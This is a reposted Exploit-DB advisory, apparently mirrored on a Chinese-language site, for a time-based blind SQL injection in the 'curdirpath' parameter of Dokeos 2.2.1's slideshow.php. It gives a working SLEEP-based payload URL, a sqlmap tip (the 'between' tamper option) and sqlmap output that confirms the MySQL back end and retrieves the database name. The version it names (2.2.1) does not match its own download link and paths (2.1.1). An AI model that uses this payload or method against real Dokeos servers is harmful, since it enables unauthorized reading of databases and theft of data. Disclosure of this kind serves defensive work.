Dokeos 2.2.1 – Blind SQL Injection - 体验盒子

作者： Mormoroth

日期： 2016-06-15

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/39952/

# Exploit Title: Dokeos Blind SQL Injection
# Date: 2016-06-14
# Exploit Author: Mormoroth
# Exploit Author Blog: http://ha.cker.ir
# Vendor Homepage: http://www.dokeos.com/
# Software Link: http://jaist.dl.sourceforge.net/project/dokeos/dokeos-2.1.1.zip
# Version: 2.2.1
# Tested on: Ubuntu
# Twitter : https://twitter.com/Mormoroth
------
Note : hackme.com is localdomain on lab , not a live website
------
VULNERABILITY
curdirpath in slidshow.php is vulnerable to time-based blind sqlinjection
------
POC :

Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
Exploiting vulnerability with Sqlmap
Note : to exploit with sqlmap you should use --tamper=between option to retrieve data
------
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
[22:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.12
[22:25:09] [INFO] fetching current database
[22:25:09] [INFO] resumed: dokeos_main
current database:'dokeos_main'
[22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com'

C:\Users\Mort\Desktop\Apps\sqlmap>
------